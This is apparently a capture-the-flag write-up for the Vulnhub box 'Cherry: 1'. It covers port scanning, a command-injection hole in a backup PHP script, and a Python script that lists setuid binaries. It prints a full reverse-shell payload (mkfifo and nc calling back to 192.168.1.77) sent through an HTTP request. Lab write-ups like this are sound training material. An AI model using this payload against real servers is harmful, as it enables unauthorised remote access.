Vulnhub - Cherry: 1
Tested: VMware Workstation 15.x Pro (this works better with VMware than with VirtualBox)
Goal: get a root shell (i.e. root@localhost:~#) and then obtain the flag under /root.
This is another easy rated box from the same people who made Chili.
This time we get four ports:
- 22/tcp open ssh
- 80/tcp open http
- 7755/tcp open unknown
- 33060/tcp open mysqlx
A more detailed scan shows that port 80 is nginx and port 7755 is a second HTTP server, this time Apache. Nmap can't positively identify the service on 33060, though its guess of mysqlx (the MySQL X protocol) matches that port's usual use.
Fuzzing for subdomains turns up nothing, and gobusting turns up just a single directory, /backup. The front page of both webservers gives us a picture of a cherry, but this time I didn't bother trying stego techniques on it. The two webservers appear basically identical, except that on Apache (7755) we can access /backup, whereas on nginx (80) it's forbidden.
So, what’s in backup? This stuff:
- command.php 2020-09-07 03:30 293
- latest.tar.gz 2020-09-01 18:54 12M
- master.zip 2020-09-07 03:33 11M
- master.zip.bak 2020-09-07 03:34 11M
We download these files, and the interesting one is command.php. Here’s what it contains:
Hmm. So what happens if we do this?
That gives us RCE: whatever we put in the backup parameter of command.php is run as a shell command.
I used Burp Suite with the following payload (the ; and & in the command are URL-encoded as %3b and %26 so they survive the query string, and spaces become +):
GET /backup/command.php?backup=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.1.77+1235+>/tmp/f HTTP/1.1
to get a shell on the box, and then I ran LinPEAS.
LinPEAS flags an SUID binary; this time it's setarch.
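The check behind that finding is the usual walk for setuid files (what `find / -perm -4000` or LinPEAS reports). Here is an added example, not from the writeup or LinPEAS, that does the same walk in Python, reports the owner so you can see which ones are root-owned, and includes a sanity check on a scratch directory so you can confirm the detector works before running it over / on the box. The helper and function names are my own.

```python
"""Enumerate setuid binaries (added example; equivalent to `find / -perm -4000`).
Function names are assumptions made for this example."""
import os
import stat
import tempfile


def find_suid(root: str = "/") -> list[tuple[str, int]]:
    """Return (path, owner_uid) for every regular file under `root` that has
    the setuid bit. Symlinks are not followed, so the real binary is reported,
    and unreadable directories are skipped instead of aborting the walk."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: do not resolve symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append((path, st.st_uid))
    return sorted(found)


def root_owned_suid(root: str = "/") -> list[str]:
    """Only the entries that matter for escalation: setuid files owned by uid 0."""
    return [path for path, uid in find_suid(root) if uid == 0]


def selfcheck() -> list[str]:
    """Build a scratch directory (constructed test data) with one setuid file and
    one plain file, and return the basenames find_suid reports there."""
    with tempfile.TemporaryDirectory() as tmp:
        suid_path = os.path.join(tmp, "suid_bin")
        plain_path = os.path.join(tmp, "plain_bin")
        for p in (suid_path, plain_path):
            with open(p, "wb") as fh:
                fh.write(b"#!/bin/sh\n")
        os.chmod(suid_path, 0o4755)   # rwsr-xr-x
        os.chmod(plain_path, 0o755)   # rwxr-xr-x
        return [os.path.basename(p) for p, _uid in find_suid(tmp)]


if __name__ == "__main__":
    assert selfcheck() == ["suid_bin"]
    for path, uid in find_suid("/"):
        flag = "  <-- not normally setuid" if os.path.basename(path) == "setarch" else ""
        print(f"{uid:5d} {path}{flag}")
```

On a stock system setarch is not setuid, so it standing out in this list is the cue the writeup is pointing at; anything unexpected in the root-owned set deserves a closer look.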
So yes, it was easy after all.